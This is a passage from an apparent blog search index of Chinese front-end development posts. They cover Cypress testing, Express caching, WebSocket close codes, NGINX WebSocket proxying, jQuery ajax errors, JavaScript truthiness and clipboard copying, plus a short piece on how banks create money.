动态背景图往往都会给人很酷炫的感觉,但是这种背景图的制作并不是很复杂,如果你使用particles.js来制作,制作一些动态背景图只需要几行代码就可以搞定。但是这种酷炫的背后,CPU也在承受着压力。\nparticles.js提供的demo效果图,在Chrome中CPU会被提高到100%。\n也有几家使用动态背景图的官网。我记得知乎以前就用过动态背景图,但是现在找不到了。另外一个使用动态背景图的是daocloud, CPU也是会在首页飙升到50%。\n所谓:强招必自损,动态背景图在给人以炫酷科技感的同时,也需要权衡这种技术对客户计算机的压力。\n另外,不要小看JavaScript, 它也可能引起大问题","title":"记一次如何解决谷歌浏览器占用过高cpu问题过程"},{"content":"某些IE浏览器location.origin属性是undefined,所以如果你要使用该属性,那么要注意做个能力检测。\nif (!window.location.origin) { window.location.origin = window.location.protocol + \u0026#34;//\u0026#34; + window.location.hostname + (window.location.port ? \u0026#39;:\u0026#39; + window.location.port: \u0026#39;\u0026#39;); }i ","permalink":"https://wdd.js.org/posts/2018/05/ie-not-support-location-origin/","summary":"某些IE浏览器location.origin属性是undefined,所以如果你要使用该属性,那么要注意做个能力检测。\nif (!window.location.origin) { window.location.origin = window.location.protocol + \u0026#34;//\u0026#34; + window.location.hostname + (window.location.port ? \u0026#39;:\u0026#39; + window.location.port: \u0026#39;\u0026#39;); }i ","title":"IE浏览器不支持location.origin"},{"content":"1. 目前E2E测试工具有哪些? 项目 Web Star puppeteer Chromium (~170Mb Mac, ~282Mb Linux, ~280Mb Win) 31906 nightmare Electron 15502 nightwatch WebDriver 8135 protractor selenium 7532 casperjs PhantomJS 7180 cypress Electron 5303 Zombie 不需要 4880 testcafe 不需要 4645 CodeceptJS webdriverio 1665 端到端测试一般都需要一个Web容器,来运行前端应用。例如Chromium, Electron, PhantomJS, WebDriver等等。\n从体积角度考虑,这些Web容器体积一般都很大。\n从速度的角度考虑:PhantomJS, WebDriver \u0026lt; Electon, Chromium。\n而且每个工具的侧重点也不同,建议按照需要去选择。\n2. 优秀的端到端测试工具应该有哪些特点? 安装简易:我希望它非常容易安装,最好可以一行命令就可以安装完毕 依赖较少:我只想做个E2E测试,不想安装jdk, python之类的东西 速度很快:运行测试用例的速度要快 报错详细:详细的报错 API完备:鼠标键盘操作接口,DOM查询接口等 Debug方便:出错了可以很方便的调试,而不是去猜 3. 为什么要用Cypress? Cypress基本上拥有了上面的特点之外,还有以下特点。\n时光穿梭 测试运行时,Cypress会自动截图,你可以轻易的查看每个时间的截图 Debug友好 不需要再去猜测为什么测试有失败了,Cypress提供Chrome DevTools, 所以Debug是非常方便的。 实时刷新 Cypress检测测试用例改变后,会自动刷新 自动等待 不需要在使用wait类似的方法等待某个DOM出现,Cypress会自动帮你做这些 Spies, stubs, and clocks Verify and control the behavior of functions, server responses, or timers. The same functionality you love from unit testing is right at your fingertips. 网络流量控制 在不涉及服务器的情况下轻松控制,存根和测试边缘案例。无论你喜欢,你都可以存储网络流量。 一致的结果 我们的架构不使用Selenium或WebDriver。向快速,一致和可靠的无剥落测试问好。 截图和视频 查看失败时自动截取的截图,或无条件运行时整个测试套件的视频。 4. 安装cypress 4.1. 使用npm方法安装 注意这个方法需要下载压缩过Electron, 所以可能会花费几分钟时间,请耐心等待。\nnpm i cypress -D 4.2. 直接下载Cypress客户端 你可以把Cypress想想成一个浏览器,可以单独把它下载下来,安装到电脑上,当做一个客户端软件来用。\n打开之后就是这个样子,可以手动去打开项目,运行测试用例。\n5. 初始化Cypress Cypress初始化,会在项目根目录自动生成cypress文件夹,并且里面有些测试用例模板,可以很方便的学习。\n初始化的方法有两种。\n如果你下载的客户端,那么你用客户端打开项目时,它会检测项目目录下有没有Cypress目录,如果没有,就自动帮你生成模板。\n如果你使用npm安装的Cypress,可以使用命令node_modules/.bin/cypress open去初始化\n6. 编写测试用例 // hacker-news.js describe(\u0026#39;Hacker News登录测试\u0026#39;, () =\u0026gt; { it(\u0026#39;登录页面\u0026#39;, () =\u0026gt; { cy.visit(\u0026#39;https://news.ycombinator.com/login?goto=news\u0026#39;) cy.get(\u0026#39;input[name=\u0026#34;acct\u0026#34;]\u0026#39;).eq(0).type(\u0026#39;test\u0026#39;) cy.get(\u0026#39;input[name=\u0026#34;pw\u0026#34;]\u0026#39;).eq(0).type(\u0026#39;123456\u0026#39;) cy.get(\u0026#39;input[value=\u0026#34;login\u0026#34;]\u0026#39;).click() cy.contains(\u0026#39;Bad login\u0026#39;) }) }) 7. 查看结果 打开Cypress客户端,选择要测试项目的根目录,点击hacker-news.js后,测试用例就会自动运行\n运行结束后,左侧栏目鼠标移动上去,右侧栏都会显示出该步骤的截图,所以叫做时光穿梭功能。\n从截图也可以看出来,Cypress的步骤描述很详细。\n","permalink":"https://wdd.js.org/posts/2018/05/e2e-testing-hacker-news-with-cypress/","summary":"1. 目前E2E测试工具有哪些? 项目 Web Star puppeteer Chromium (~170Mb Mac, ~282Mb Linux, ~280Mb Win) 31906 nightmare Electron 15502 nightwatch WebDriver 8135 protractor selenium 7532 casperjs PhantomJS 7180 cypress Electron 5303 Zombie 不需要 4880 testcafe 不需要 4645 CodeceptJS webdriverio 1665 端到端测试一般都需要一个Web容器,来运行前端应用。例如Chromium, Electron, PhantomJS, WebDriver等等。\n从体积角度考虑,这些Web容器体积一般都很大。\n从速度的角度考虑:PhantomJS, WebDriver \u0026lt; Electon, Chromium。\n而且每个工具的侧重点也不同,建议按照需要去选择。\n2. 优秀的端到端测试工具应该有哪些特点? 安装简易:我希望它非常容易安装,最好可以一行命令就可以安装完毕 依赖较少:我只想做个E2E测试,不想安装jdk, python之类的东西 速度很快:运行测试用例的速度要快 报错详细:详细的报错 API完备:鼠标键盘操作接口,DOM查询接口等 Debug方便:出错了可以很方便的调试,而不是去猜 3. 为什么要用Cypress? Cypress基本上拥有了上面的特点之外,还有以下特点。\n时光穿梭 测试运行时,Cypress会自动截图,你可以轻易的查看每个时间的截图 Debug友好 不需要再去猜测为什么测试有失败了,Cypress提供Chrome DevTools, 所以Debug是非常方便的。 实时刷新 Cypress检测测试用例改变后,会自动刷新 自动等待 不需要在使用wait类似的方法等待某个DOM出现,Cypress会自动帮你做这些 Spies, stubs, and clocks Verify and control the behavior of functions, server responses, or timers.","title":"端到端测试哪家强?不容错过的Cypress"},{"content":" 1. 谷歌搜索指令 2. 基本命令 3. 关键词使用 4. 特殊工具 4.1. define 快速返回关键词定义 4.2. 计算器 4.3. 单位转换 4.4. 时区查询 4.5. 地区查询 4.6. 天气查询 5. 参考 1. 谷歌搜索指令 2. 基本命令 符号 简介 语法 注意点 示例 | 包含A且必须包含B | A +B | A和+之间有空格 | Maxwell +wills | 包含A且不包含B | A -B | A和+之间有空格 | Maxwell -Absolom \u0026quot; \u0026quot; | 完整匹配AB | \u0026ldquo;AB\u0026rdquo; | | \u0026ldquo;Thomas Jefferson\u0026rdquo; OR | 包含A或者B | A OR B 或者 A | B | | nodejs OR webpack +-\u0026ldquo;OR | 指令可以组合,完成更复杂的查询 | | | beach -sandy +albert +nathaniel ~ | 包含A, 并且包含B的近义词 | A ~B | | github ~js .. | 区间查询 AB之间 | A..B | | china 1888..2000 | 匹配任意字符 | | | node* java site: | 站内搜索 | A site:B | | | DLL site:webpack.js.org filetype: | 按照文件类型搜索 | A filetype:B | | csta filetype:pdf 3. 关键词使用 方法 说明 示例 列举关键词 列举所有和搜索相关的关键词,并且尽量把重要的关键词排在前面。不同的关键词顺序会导致不同的返回不同的结果 书法 毛笔 绘画 不要使用某些词 如代词介词语气词,如i, the, of, it, 我,吗 搜索引擎一般会直接忽略这些信息含量少的词 大小写不敏感 大写字符和小写字符在搜索引擎看没有区别,尽量使用小写的就可以 4. 特殊工具 4.1. define 快速返回关键词定义 4.2. 计算器 4.3. 单位转换 4.4. 时区查询 4.5. 地区查询 4.6. 天气查询 5. 参考 Advanced Google Search Commands Google_rules_for_searching.pdf An introduction to search commands ","permalink":"https://wdd.js.org/posts/2018/04/master-google-search-command/","summary":"1. 谷歌搜索指令 2. 基本命令 3. 关键词使用 4. 特殊工具 4.1. define 快速返回关键词定义 4.2. 计算器 4.3. 单位转换 4.4. 时区查询 4.5. 地区查询 4.6. 天气查询 5. 参考 1. 谷歌搜索指令 2. 基本命令 符号 简介 语法 注意点 示例 | 包含A且必须包含B | A +B | A和+之间有空格 | Maxwell +wills | 包含A且不包含B | A -B | A和+之间有空格 | Maxwell -Absolom \u0026quot; \u0026quot; | 完整匹配AB | \u0026ldquo;AB\u0026rdquo; | | \u0026ldquo;Thomas Jefferson\u0026rdquo; OR | 包含A或者B | A OR B 或者 A | B | | nodejs OR webpack +-\u0026ldquo;OR | 指令可以组合,完成更复杂的查询 | | | beach -sandy +albert +nathaniel ~ | 包含A, 并且包含B的近义词 | A ~B | | github ~js .","title":"掌握谷歌搜索高级指令"},{"content":"1. 角色划分 名称 角色 账户 A 银行家 0 B 建筑商 100万 C 商人 0 2. 建筑商向银行存储100万 名称 角色 账户 A 银行家 100万 现金 B 建筑商 100万 支票 C 商人 0 2. 商人向银行贷款100万 此时银行的账户存款已经是0了,但是B还在银行存了100万。那银行究竟是还有100万呢, 还是一毛都没有了呢。\n此时建筑商如果要取现金,那么银行马上就要破产。\n名称 角色 账户 A 银行家 100现金 B 建筑商 100万 支票 C 商人 100万 支票 3. 商人需要建筑商来建造房子 商人需要建筑商来建筑房子,费用是100万,付给建筑商,建筑商又把100支票存到银行\n名称 角色 账户 A 银行家 100万现金 B 建筑商 200万 支票 C 商人 0 商人又从银行借钱100万,来付给建筑商建房子,建筑商把钱存到银行\n名称 角色 账户 A 银行家 100万现金 B 建筑商 300万 支票 C 商人 0 只要这个循环还在继续,你会发现,建筑商的账面上的支票越来越多,但是银行始终都是100万现金存在那里,从来都没动过。\n💰就这样魔术般的产生, 如果银行那一天缺钱了,银行就拿一张纸出来,上面写着1000万。看!银行造钱就是那么容易。\n","permalink":"https://wdd.js.org/posts/2018/04/the-secret-of-bank-create-money/","summary":"1. 角色划分 名称 角色 账户 A 银行家 0 B 建筑商 100万 C 商人 0 2. 建筑商向银行存储100万 名称 角色 账户 A 银行家 100万 现金 B 建筑商 100万 支票 C 商人 0 2. 商人向银行贷款100万 此时银行的账户存款已经是0了,但是B还在银行存了100万。那银行究竟是还有100万呢, 还是一毛都没有了呢。\n此时建筑商如果要取现金,那么银行马上就要破产。\n名称 角色 账户 A 银行家 100现金 B 建筑商 100万 支票 C 商人 100万 支票 3. 商人需要建筑商来建造房子 商人需要建筑商来建筑房子,费用是100万,付给建筑商,建筑商又把100支票存到银行\n名称 角色 账户 A 银行家 100万现金 B 建筑商 200万 支票 C 商人 0 商人又从银行借钱100万,来付给建筑商建房子,建筑商把钱存到银行\n名称 角色 账户 A 银行家 100万现金 B 建筑商 300万 支票 C 商人 0 只要这个循环还在继续,你会发现,建筑商的账面上的支票越来越多,但是银行始终都是100万现金存在那里,从来都没动过。","title":"金钱游戏 - 银行造钱的秘密"},{"content":"1. Express设置缓存 Express设置静态文件的方法很简单,一行代码搞定。app.use(express.static(path.join(__dirname, 'public'), {maxAge: MAX_AGE})), 注意MAX_AGE的单位是毫秒。这句代码的含义是让pulic目录下的所有文件都可以在浏览器中缓存,过期时长为MAX_AGE毫秒。\napp.use(express.static(path.join(__dirname, \u0026#39;public\u0026#39;), {maxAge: config.get(\u0026#39;maxAge\u0026#39;)})) 2. Express让浏览器清除缓存 缓存的好处是可以更快的访问服务,但是缓存也有坏处。例如设置缓存为10天,第二天的时候服务更新了。如果客户端不强制刷新页面的话,浏览器会一致使用更新前的静态文件,这样会导致一些BUG。你总当每次出问题时,客户打电话给你后,你让他强制刷新浏览器吧?\n所以,最好在服务重启后,重新让浏览器获取最新的静态文件。\n设置的方式是给每一个静态文件设置一个时间戳。\n例如:vendor/loadjs/load.js?_=123898923423\u0026quot;\u0026gt;\u0026lt;/script\u0026gt;\n2.1. Express 路由 // /routes/index.js router.get(\u0026#39;/home\u0026#39;, function (req, res, next) { res.render(\u0026#39;home\u0026#39;, {config: config, serverStartTimestamp: new Date().getTime()}) }) 2.2. 视图文件 // views/home.html \u0026lt;script src=\u0026#34;vendor/loadjs/load.js?_=\u0026lt;%= serverStartTimestamp %\u0026gt;\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; 设置之后,每次服务更新或者重启,浏览器都会使用最新的时间戳serverStartTimestamp,去获取静态文件。\n2.3. 动态加载JS文件 有时候js文件并不是直接在HTML中引入,可能是使用了一些js文件加载库,例如requirejs, LABjs等。这些情况下,可以在全局设置环境变量SERVER_START_TIMESTAMP,用来表示服务启动的时间戳,在获取js的时候,将该时间戳拼接在路径上。\n注意:环境变量SERVER_START_TIMESTAMP,一定要在其他脚本使用前定义。\n// views/home.html \u0026lt;script\u0026gt; var SERVER_START_TIMESTAMP = \u0026lt;%= serverStartTimestamp %\u0026gt; \u0026lt;/script\u0026gt; // load.js \u0026#39;vendor/contact-center/skill.js?_=\u0026#39; + SERVER_START_TIMESTAMP ","permalink":"https://wdd.js.org/posts/2018/04/express-static-file-cache-setting-and-cleaning/","summary":"1. Express设置缓存 Express设置静态文件的方法很简单,一行代码搞定。app.use(express.static(path.join(__dirname, 'public'), {maxAge: MAX_AGE})), 注意MAX_AGE的单位是毫秒。这句代码的含义是让pulic目录下的所有文件都可以在浏览器中缓存,过期时长为MAX_AGE毫秒。\napp.use(express.static(path.join(__dirname, \u0026#39;public\u0026#39;), {maxAge: config.get(\u0026#39;maxAge\u0026#39;)})) 2. Express让浏览器清除缓存 缓存的好处是可以更快的访问服务,但是缓存也有坏处。例如设置缓存为10天,第二天的时候服务更新了。如果客户端不强制刷新页面的话,浏览器会一致使用更新前的静态文件,这样会导致一些BUG。你总当每次出问题时,客户打电话给你后,你让他强制刷新浏览器吧?\n所以,最好在服务重启后,重新让浏览器获取最新的静态文件。\n设置的方式是给每一个静态文件设置一个时间戳。\n例如:vendor/loadjs/load.js?_=123898923423\u0026quot;\u0026gt;\u0026lt;/script\u0026gt;\n2.1. Express 路由 // /routes/index.js router.get(\u0026#39;/home\u0026#39;, function (req, res, next) { res.render(\u0026#39;home\u0026#39;, {config: config, serverStartTimestamp: new Date().getTime()}) }) 2.2. 视图文件 // views/home.html \u0026lt;script src=\u0026#34;vendor/loadjs/load.js?_=\u0026lt;%= serverStartTimestamp %\u0026gt;\u0026#34;\u0026gt;\u0026lt;/script\u0026gt; 设置之后,每次服务更新或者重启,浏览器都会使用最新的时间戳serverStartTimestamp,去获取静态文件。\n2.3. 动态加载JS文件 有时候js文件并不是直接在HTML中引入,可能是使用了一些js文件加载库,例如requirejs, LABjs等。这些情况下,可以在全局设置环境变量SERVER_START_TIMESTAMP,用来表示服务启动的时间戳,在获取js的时候,将该时间戳拼接在路径上。\n注意:环境变量SERVER_START_TIMESTAMP,一定要在其他脚本使用前定义。\n// views/home.html \u0026lt;script\u0026gt; var SERVER_START_TIMESTAMP = \u0026lt;%= serverStartTimestamp %\u0026gt; \u0026lt;/script\u0026gt; // load.js \u0026#39;vendor/contact-center/skill.js?_=\u0026#39; + SERVER_START_TIMESTAMP ","title":"Express静态文件浏览器缓存设置与缓存清除"},{"content":"1. 把错误打印出来 WebSocket断开的原因有很多,最好在WebSocket断开时,将错误打印出来。\n在线demo地址:https://wdd.js.org/websocket-demos/\nws.onerror = function (e) { console.log(\u0026#39;WebSocket发生错误: \u0026#39; + e.code) console.log(e) } 如果你想自己玩玩WebSocket, 但是你又不想自己部署一个WebSocket服务器,你可以使用ws = new WebSocket('wss://echo.websocket.org/'), 你向echo.websocket.org发送消息,它会回复你同样的消息。\n2. 重要信息错误状态码 WebSocket断开时,会触发CloseEvent, CloseEvent会在连接关闭时发送给使用 WebSockets 的客户端. 它在 WebSocket 对象的 onclose 事件监听器中使用。CloseEvent的code字段表示了WebSocket断开的原因。可以从该字段中分析断开的原因。\n3. 关闭状态码表 一般来说1006的错误码出现的情况比较常见,该错误码一般出现在断网时。\n状态码 名称 描述 0–999 保留段, 未使用. 1000 CLOSE_NORMAL 正常关闭; 无论为何目的而创建, 该链接都已成功完成任务. 1001 CLOSE_GOING_AWAY 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 1002 CLOSE_PROTOCOL_ERROR 由于协议错误而中断连接. 1003 CLOSE_UNSUPPORTED 由于接收到不允许的数据类型而断开连接 (如仅接收文本数据的终端接收到了二进制数据). 1004 保留. 其意义可能会在未来定义. 1005 CLOSE_NO_STATUS 保留. 表示没有收到预期的状态码. 1006 CLOSE_ABNORMAL 保留. 用于期望收到状态码时连接非正常关闭 (也就是说, 没有发送关闭帧). 1007 Unsupported Data 由于收到了格式不符的数据而断开连接 (如文本消息中包含了非 UTF-8 数据). 1008 Policy Violation 由于收到不符合约定的数据而断开连接. 这是一个通用状态码, 用于不适合使用 1003 和 1009 状态码的场景. 1009 CLOSE_TOO_LARGE 由于收到过大的数据帧而断开连接. 1010 Missing Extension 客户端期望服务器商定一个或多个拓展, 但服务器没有处理, 因此客户端断开连接. 1011 Internal Error 客户端由于遇到没有预料的情况阻止其完成请求, 因此服务端断开连接. 1012 Service Restart 服务器由于重启而断开连接. 1013 Try Again Later 服务器由于临时原因断开连接, 如服务器过载因此断开一部分客户端连接. 1014 由 WebSocket标准保留以便未来使用. 1015 TLS Handshake 保留. 表示连接由于无法完成 TLS 握手而关闭 (例如无法验证服务器证书). 1016–1999 由 WebSocket标准保留以便未来使用. 2000–2999 由 WebSocket拓展保留使用. 3000–3999 可以由库或框架使用.? 不应由应用使用. 可以在 IANA 注册, 先到先得. 4000–4999 可以由应用使用. 4. 其他注意事项 如果你的服务所在的域是HTTPS的,那么使用的WebSocket协议也必须是wss, 而不能是ws\n5. 如何在老IE上使用原生WebSocket? web-socket-js是基于flash的技术,只需要引入两个js文件和一个swf文件,就可以让浏览器用于几乎原生的WebSocket接口。另外,web-socket-js还是需要在ws服务端843端口做一个flash安全策略文件的服务。\n我自己曾经基于stompjs和web-socket-js,做WebSocket兼容到IE5, 当然了stompjs在低版本的IE上有兼容性问题, 而且stompjs已经不再维护了,你可以使用我fork的一个版本,地址是:https://github.com/wangduanduan/stomp-websocket/blob/master/lib/stomp.js\n主要是老版本IE在正则表达式行为方面有点异常。\n// fix ie8, ie9, RegExp not normal problem // in chrome the frames length will be 2, but in ie8, ie9, it well be 1 // by wdd 20180321 if (frames.length === 1) { frames.push(\u0026#39;\u0026#39;) } 6. 参考 CloseEvent getting the reason why websockets closed with close code 1006 Defined Status Codes ","permalink":"https://wdd.js.org/posts/2018/03/websocket-close-reasons/","summary":"1. 把错误打印出来 WebSocket断开的原因有很多,最好在WebSocket断开时,将错误打印出来。\n在线demo地址:https://wdd.js.org/websocket-demos/\nws.onerror = function (e) { console.log(\u0026#39;WebSocket发生错误: \u0026#39; + e.code) console.log(e) } 如果你想自己玩玩WebSocket, 但是你又不想自己部署一个WebSocket服务器,你可以使用ws = new WebSocket('wss://echo.websocket.org/'), 你向echo.websocket.org发送消息,它会回复你同样的消息。\n2. 重要信息错误状态码 WebSocket断开时,会触发CloseEvent, CloseEvent会在连接关闭时发送给使用 WebSockets 的客户端. 它在 WebSocket 对象的 onclose 事件监听器中使用。CloseEvent的code字段表示了WebSocket断开的原因。可以从该字段中分析断开的原因。\n3. 关闭状态码表 一般来说1006的错误码出现的情况比较常见,该错误码一般出现在断网时。\n状态码 名称 描述 0–999 保留段, 未使用. 1000 CLOSE_NORMAL 正常关闭; 无论为何目的而创建, 该链接都已成功完成任务. 1001 CLOSE_GOING_AWAY 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 1002 CLOSE_PROTOCOL_ERROR 由于协议错误而中断连接. 1003 CLOSE_UNSUPPORTED 由于接收到不允许的数据类型而断开连接 (如仅接收文本数据的终端接收到了二进制数据). 1004 保留. 其意义可能会在未来定义. 1005 CLOSE_NO_STATUS 保留. 表示没有收到预期的状态码. 1006 CLOSE_ABNORMAL 保留. 用于期望收到状态码时连接非正常关闭 (也就是说, 没有发送关闭帧).","title":"WebSocket断开原因分析"},{"content":"无论什么语言,都需要逻辑,而逻辑中,能否判断出真假,是最基本也是最重要技能之一。\nJS中的假值有6个 false '' undefinded null 0, +0, -0 NaN 有点类似假值的真值有两个 {} [] 空对象和空数组,很多初学者都很用把这两个当做假值。但是实际上他们是真值,你只需要记住,除了null之外的所有对象类型的数据,都是真值。\ntypeof null // \u0026#39;object\u0026#39; 据说:typeof null返回对象这是一个js语言中的bug。实际上typeof null应该返回null才比较准确,但是这个bug已经存来好久了。几乎所有的代码里都这样去判断。如果把typeof null给改成返回null, 那么这必定会导致JS世界末日。\n我们承认JS并不完美,她有很多小缺点,但是这并不妨碍她吸引万千开发者拜倒在她的石榴裙下。\n就像一首歌唱的:有些人说不清哪里好 但就是谁都替代不了\n","permalink":"https://wdd.js.org/posts/2018/03/js-true-and-false-value/","summary":"无论什么语言,都需要逻辑,而逻辑中,能否判断出真假,是最基本也是最重要技能之一。\nJS中的假值有6个 false '' undefinded null 0, +0, -0 NaN 有点类似假值的真值有两个 {} [] 空对象和空数组,很多初学者都很用把这两个当做假值。但是实际上他们是真值,你只需要记住,除了null之外的所有对象类型的数据,都是真值。\ntypeof null // \u0026#39;object\u0026#39; 据说:typeof null返回对象这是一个js语言中的bug。实际上typeof null应该返回null才比较准确,但是这个bug已经存来好久了。几乎所有的代码里都这样去判断。如果把typeof null给改成返回null, 那么这必定会导致JS世界末日。\n我们承认JS并不完美,她有很多小缺点,但是这并不妨碍她吸引万千开发者拜倒在她的石榴裙下。\n就像一首歌唱的:有些人说不清哪里好 但就是谁都替代不了","title":"js中的真值和假值"},{"content":"1. AWS EC2 不支持WebSocket 直达解决方案 英文版\n简单说一下思路:WebSocket底层基于TCP协议的,如果你的服务器基于HTTP协议暴露80端口,那WebSocket肯定无法连接。你只要将HTTP协议修改成TCP协议就可以了。\n然后是安全组的配置:\n同样如果使用了NGINX作为反向代理,那么NGINX也需要做配置的。\n// https://gist.githubusercontent.com/unshift/324be6a8dc9e880d4d670de0dc97a8ce/raw/29507ed6b3c9394ecd7842f9d3228827cffd1c58/elasticbeanstalk_websockets files: \u0026#34;/etc/nginx/conf.d/01_websockets.conf\u0026#34; : mode: \u0026#34;000644\u0026#34; owner: root group: root content : | upstream nodejs { server 127.0.0.1:8081; keepalive 256; } server { listen 8080; location / { proxy_pass http://nodejs; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection \u0026#34;upgrade\u0026#34;; proxy_http_version 1.1; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } } \u0026#34;/opt/elasticbeanstalk/hooks/appdeploy/enact/41_remove_eb_nginx_confg.sh\u0026#34;: mode: \u0026#34;000755\u0026#34; owner: root group: root content : | mv /etc/nginx/conf.d/00_elastic_beanstalk_proxy.conf /etc/nginx/conf.d/00_elastic_beanstalk_proxy.conf.old 2. NGINX做反向代理是需要注意的问题 如果排除所有问题后,那剩下的问题可以考虑出在反向代理上,一下有几点是可以考虑的。\nHTTP的版本问题: http有三个版本,http 1.0, 1.1, 2.0, 现在主流的浏览器都是使用http 1.1版本,为了保证更好的兼容性,最好转发时不要修改协议的版本号\nNGINX具有路径重写功能,如果你使用了该功能,就要考虑问题可能出在这里,因为NGINX在路径重写时,需要对路径进行编解码,有可能在解码之后,没有编码就发送给后端的服务器,导致后端服务器无法对URL进行解码。\n3. IE8 IE9 有没有简单方便支持WebSocket的方案 目前测试下来,最简单方案是基于flash的。参考:https://github.com/gimite/web-socket-js,\n注意该方案需要在WebSocket服务上的843端口, 提供socket_policy_files, 也可以参考:A PolyFill for WebSockets\n网上也有教程是使用socket.io基于ajax长轮训的方案,如果服务端已经确定的情况下,一般是不会轻易改动服务端代码的。而且ajax长轮训也是有延迟,和disconnect时,无法回调的问题。\n4. stompjs connected后,没有调用connect_callBack 该问题主要是使用web-socket-js,在ie8,ie9上出现的\n该问题还没有分析出原因,但是看了stompjs的源码不是太多,明天用源码调试看看原因。\n问题已经找到,请参考:https://github.com/wangduanduan/stomp-websocket#about-ie8-ie9-use-websocket\n5. 参考文献 STOMP Over WebSocket STOMP Protocol Specification, Version 1.1 Stomp Over Websocket文档, ","permalink":"https://wdd.js.org/posts/2018/03/stomp-over-websocket/","summary":"1. AWS EC2 不支持WebSocket 直达解决方案 英文版\n简单说一下思路:WebSocket底层基于TCP协议的,如果你的服务器基于HTTP协议暴露80端口,那WebSocket肯定无法连接。你只要将HTTP协议修改成TCP协议就可以了。\n然后是安全组的配置:\n同样如果使用了NGINX作为反向代理,那么NGINX也需要做配置的。\n// https://gist.githubusercontent.com/unshift/324be6a8dc9e880d4d670de0dc97a8ce/raw/29507ed6b3c9394ecd7842f9d3228827cffd1c58/elasticbeanstalk_websockets files: \u0026#34;/etc/nginx/conf.d/01_websockets.conf\u0026#34; : mode: \u0026#34;000644\u0026#34; owner: root group: root content : | upstream nodejs { server 127.0.0.1:8081; keepalive 256; } server { listen 8080; location / { proxy_pass http://nodejs; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection \u0026#34;upgrade\u0026#34;; proxy_http_version 1.1; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } } \u0026#34;/opt/elasticbeanstalk/hooks/appdeploy/enact/41_remove_eb_nginx_confg.sh\u0026#34;: mode: \u0026#34;000755\u0026#34; owner: root group: root content : | mv /etc/nginx/conf.","title":"在实践中我遇到stompjs, websocket和nginx的问题与总结"},{"content":"1. 问题现象 HTTP 状态码为 200 OK 时, jquery ajax报错\n2. 问题原因 jquery ajax的dataType字段包含:json, 但是服务端返回的数据不是规范的json格式,导致jquery解析json字符串报错,最终导致ajax报错。\njQuery ajax 官方文档上说明:\n\u0026ldquo;json\u0026rdquo;: Evaluates the response as JSON and returns a JavaScript object. Cross-domain \u0026ldquo;json\u0026rdquo; requests are converted to \u0026ldquo;jsonp\u0026rdquo; unless the request includes jsonp: false in its request options. The JSON data is parsed in a strict manner; any malformed JSON is rejected and a parse error is thrown. As of jQuery 1.9, an empty response is also rejected; the server should return a response of null or {} instead. (See json.org for more information on proper JSON formatting.)\n设置dataType为json时,jquery就会去解析响应体为JavaScript对象。跨域的json请求会被转化成jsonp, 除非设置了jsonp: false。JSON数据会以严格模式去解析,任何不规范的JSON字符串都会解析异常并抛出错误。从jQuery 1.9起,一个空的响应也会被抛出异常。服务端应该返回一个null或者{}去代替空响应。参考json.org, 查看更多内容\n3. 解决方案 这个问题的原因是后端返回的数据格式不规范,所以后端在返回结果是,不要使用空的响应,也不应该去手动拼接JSON字符串,而应该交给响应的库来实现JSON序列化字符串工作。\n方案1: 如果后端确定响应体中不返回数据,那么就把状态码设置为204,而不是200。我一直逼着后端同事这么做。 方案2:如果后端接口想返回200,那么请返回一个null或者{}去代替空响应 方案3:别用jQuery的ajax,换个其他的库试试 4. 参考 Ajax request returns 200 OK, but an error event is fired instead of success jQuery.ajax ","permalink":"https://wdd.js.org/posts/2018/03/status-code-200-jquery-ajax-failed/","summary":"1. 问题现象 HTTP 状态码为 200 OK 时, jquery ajax报错\n2. 问题原因 jquery ajax的dataType字段包含:json, 但是服务端返回的数据不是规范的json格式,导致jquery解析json字符串报错,最终导致ajax报错。\njQuery ajax 官方文档上说明:\n\u0026ldquo;json\u0026rdquo;: Evaluates the response as JSON and returns a JavaScript object. Cross-domain \u0026ldquo;json\u0026rdquo; requests are converted to \u0026ldquo;jsonp\u0026rdquo; unless the request includes jsonp: false in its request options. The JSON data is parsed in a strict manner; any malformed JSON is rejected and a parse error is thrown. As of jQuery 1.9, an empty response is also rejected; the server should return a response of null or {} instead.","title":"状态码为200时 jQuery ajax报错"},{"content":"1. 兼容情况 如果想浏览器支持粘贴功能,那么浏览器必须支持,document.execCommand(\u0026lsquo;copy\u0026rsquo;)方法,也可以根据document.queryCommandEnabled(\u0026lsquo;copy\u0026rsquo;),返回的true或者false判断浏览器是否支持copy命令。\n从下表可以看出,主流的浏览器都支持execCommand命令\n2. 复制的原理 查询元素 选中元素 执行复制命令 3. 代码展示 // html \u0026lt;input id=\u0026#34;username\u0026#34; value=\u0026#34;123456\u0026#34;\u0026gt; // 查询元素 var username = document.getElementById(‘username’) // 选中元素 username.select() // 执行复制 document.execCommand(\u0026#39;copy\u0026#39;) 注意: 以上代码只是简单示意,在实践过程中还有几个要判断的情况\n首要要去检测浏览器execCommand能力检测 选取元素时,有可能选取元素为空,要考虑这种情况的处理 4. 第三方方案 clipboard.js是一个比较方便的剪贴板库,功能蛮多的。\n\u0026lt;!-- Target --\u0026gt; \u0026lt;textarea id=\u0026#34;bar\u0026#34;\u0026gt;Mussum ipsum cacilds...\u0026lt;/textarea\u0026gt; \u0026lt;!-- Trigger --\u0026gt; \u0026lt;button class=\u0026#34;btn\u0026#34; data-clipboard-action=\u0026#34;cut\u0026#34; data-clipboard-target=\u0026#34;#bar\u0026#34;\u0026gt; Cut to clipboard \u0026lt;/button\u0026gt; 官方给的代码里有上面的一个示例,如果你用了这个示例,但是不起作用,那你估计是没有初始化ClipboardJS示例的。\n注意:下面的函数必须要主动调用,这样才能给响应的DOM元素注册事件。 ClipboardJS源代码压缩后大约有3kb,虽然很小了,但是如果你不需要它的这么多功能的话,其实你自己写几行代码就可以搞定复制功能。\nnew ClipboardJS(\u0026#39;.btn\u0026#39;); ","permalink":"https://wdd.js.org/posts/2018/03/clipboard-copy-tutorial/","summary":"1. 兼容情况 